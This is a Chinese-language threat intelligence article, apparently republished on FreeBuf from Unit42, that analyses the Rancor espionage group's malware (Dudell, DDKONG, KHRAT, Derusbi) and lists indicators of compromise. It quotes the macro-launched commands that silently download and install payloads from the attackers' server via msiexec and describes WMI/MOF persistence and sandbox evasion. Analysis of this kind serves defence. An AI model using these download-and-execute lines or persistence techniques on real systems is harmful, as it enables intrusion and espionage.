Rancor組織東南亞攻擊活動分析

2020-01-01 9484人圍觀 ,發現 1 個不明物體 網絡安全

在2018年6月下旬,研究人員發現了一個未知的網絡間諜組織Rancor,該組織在2017年和2018年期間在東南亞進行了有針對性的攻擊。在研究這些攻擊時發現了一個未記錄的自定義惡意軟件家族Dudell。

攻擊細節

在2018年12月上旬至2019年1月下旬之間,Rancor進行了至少兩輪攻擊,在受害者系統上安裝Derusbi或KHRat惡意軟件。 2019年1月通過149.28.156 [.] 61發送,以cswksfwq.kfesv [.]xyz或connect.bafunpda [.] xyz作為C2。

樣本分析

DUDELL

DUDELL是經過處理的Microsoft Excel文檔,其中包含惡意宏。 SHA-1 c829f5f9f89210c888c1559bb085ec6e65232de。 以下為其元數據信息:

當用戶查看文檔并單擊“啟用內容”時,將執行該文檔中的宏,這時該宏將定位并執行位于文檔屬性中“公司”字段下的數據。 位于公司字段下的數據是:

cmd /c set /p=Set v=CreateObject(^”Wscript.Shell^”):v.Run ^”msiexec /q /i http://199.247.6[.]253/ud^”,false,0 <nul > C:\Windows\System32\spool\drivers\color\tmp.vbs

C2服務器199.247.6 [。] 253由Rancor組使用。 該腳本通過Microsoft工具msiexec下載第二階段的有效負載。 在目錄c:\ Windows \ System32 \ spool \ drivers \ color中發現了文件office.vbs(SHA256:4b0b319***c2c0980390e24379a2e2a0a1e1a91d17a9d3e26be6f4a39a7afad2)。 該文件的內容是:

Set v=CreateObject(“Wscript.Shell”):v.Run “msiexec /q /i http://199.247.6[.]253/OFFICE”,false,0
SHA256 b958e481c90939962081b9fb85451a2fb28f705d5***60f5d9d5aebfb390f832

如果tmp.vbs文件包含與office.vbs文件相似的內容,可能是下載有效載荷另一種方法。

DDKONG Plugin

惡意軟件配置有以下導出條目:

DllInstall

DllInstall檢查帶有標題“ Hello Google”的隱藏窗口 和Google的類名,請參見下面的圖1。 執行此檢查以確保一次僅運行一個惡意軟件實例。

惡意軟件創建的隱藏窗口會在用戶輸入(例如鍵盤或鼠標活動)上進行過濾。 為了避沙盒分析通常不執行鼠標和鍵盤。 然后,惡意軟件將信標發送到TCP端口8080上已配置的cswksfwq.kfesv [.] xyz遠程服務器。成功連接后,惡意軟件將傳輸受害者信息,例如:主機名,IP地址,語言包以及其他操作系統信息。 傳輸的數據經過XOR編碼。 該惡意軟件支持以下功能:

終止特定進程

枚舉進程

上傳文件

下載文件

刪除文件

列出文件夾內容

枚舉存儲卷

執行命令

反向shell

截圖

KHRAT

Rmcmd

最初加載DLL時,它會動態解析并導入所需的其他模塊(DLL)。 加載并調用Rmcmd后,它將創建一個名為gkdflbmdfk的Windows互斥鎖。 這樣可以確保一次僅運行一個惡意軟件。 然后它開始向TCP端口8081上connect.bafunpda [.] xyz的域發出信號。惡意軟件從主機收集并傳輸數據,例如主機名,并以網絡流量的第一個字節為密鑰進行XOR編碼,該惡意軟件可反向shell。

惡意軟件的行為和代碼與2018年5月的KHRAT樣本有相似之處。示例(SHA256:bc1c3e754be9f2175b718aba62174a550cdc3d98ab9c36671a58073140381659)具有相同的導出條目名稱,也是一個反向shell。新的樣本是出于優化目的而重新編寫的,底層行為保持不變。

Derusbi

Derusbi是后門木馬,檢測到的樣本是一個加載程序,可為其功能加載加密的有效負載。 此DLL加載的可執行文件需要在命令行上包含32字節的密鑰,以解密嵌入的有效負載,加載流程如下:

1、如果加載樣本的模塊名為myapp.exe,則該模塊將退出

2、加載后,它會休眠六秒鐘

3、查找名為\\.\ pipe \ _kernel32.dll.ntdll.dll.use***.dll的Windows通道

4、查找名為\ Device \ acpi_010221的Windows設備

5、創建以下注冊表項

HKEY_CLASSES_ROOT \ CDO.SS_NNTPOnPostEarlySink.2名為IDX和Ver的DWORD值。

6、保存加密的數據

7、解密嵌入式有效負載

Rancor VBScript

在2019年7月發現VBScript,名為Chrome.vbs(SHA256:0C3D4DFA566F3064A8A408D3E1097**54662860BCACFB6675D2B72739CE449C2)。 VBScript有效載荷指向域bafunpda [.]xyz,KHRAT Trojan也使用此域。該VBScript被混淆,并包含打包數據,下面為VBScript的執行流程:

1、將regsv***.exe從%windir%\ syswow64復制到%windir%\ spoolsw.exe。

2、在主機的%TMP%文件夾中創建一個名為vdfjgklffsdfmv.txt的文本文件。 該文件不是文本文件,而是Windows管理對象文件MOF。

3、執行Windows mofcomp.exe,并傳入在步驟2中創建的MOF文件。

4、將數據添加到兩個注冊表項:classes和media。 數據保存在默認鍵中。

5、從步驟4中創建的注冊表項類中讀取數據的Blob,并將數據保存到文件%windir%\ pla.dat。

VBScript創建的MOF文件通過Windows Management Instrumentation達到穩定控制的目的。MOF文件創建一個計時器事件,該事件每五秒鐘觸發一次。 MOF文件的片段如下圖所示:

上圖顯示了MOF文件的主要功能。 它具有唯一的事件日志過濾器,并且每5秒運行spoolsw.exe,并將/ s / n / i參數傳入文件pla.dat,參數指示regsv***不要顯示任何消息框(/ s),不要調用DllRegisterServer或DllUnregisterServer(/ n),不要調用DllInstall(/ i)。

VBScript創建的注冊表值如下:

HKEY_CURRENT_USER \ Software \ Classes

HKEY_CURRENT_USER \ Software \ Classes中注冊表數據的文件屬性

嵌入在此注冊表項中的DLL是一個簡單的加載程序,可從注冊表HKEY_LOCAL_MACHINE \ SOFTWARE \ Clients \ Media中加載代碼

HKEY_LOCAL_MACHINE \ SOFTWARE \ Clients \ Media包含DLL的shellcode和x86代碼,數據使用 與key值0x9C異或進行編碼。

位于Media注冊表項中的DLL是KHRAT木馬的一種變體。 它向域connect.bafunpda [.] xyz發出信號,并嘗試連接到TCP端口4433。與KHRAT木馬使用的相同域,并具有相同的行為。

總結

Rancor從2017年開始活躍且一直在東南亞進行有針對性的攻擊,它使用的是自定義惡意軟件家族Dudell,一旦執行惡意宏就會下載第二階段有效負載并執行。Rancor還使用Derusbi惡意軟件在滲透目標后進行輔助加載外部程序。

IoCs

SHA256:

0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707

AAEBF987B8D80D71313C3C0F2C16D60874FFECBDDA3BB6B44D6CBA6D38031609

0D61D9BAAB9927BB484F3E60384FDB6A3709CA74BC6175AB16B220A68F2B349E

DB982B256843D8B6429AF24F766636BB0BF781B471922902D8DCF08D0C58511E

CC081FFEA6F4769733AF9D0BAE0308CA0AE63667FA225E7965DF0884E96E2D2A

BC1C3E754BE9F2175B718ABA62174A550CDC3D98AB9C36671A58073140381659

83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2abd9e0d

C2s

cswksfwq.kfesv[.]xyz

Connect.bafunpda[.]xyz

199.247.6[.]253

*參考來源:unit42,由Kriston編譯,轉載請注明來自FreeBuf.COM

相關推薦
發表評論

已有 1 條評論

取消
Loading...

這家伙太懶,還未填寫個人描述!

87 文章數 10 評論數 3 關注者

特別推薦

活動預告

填寫個人信息

姓名
電話
郵箱
公司
行業
職位
css.php 微信上那些说赚钱是真的吗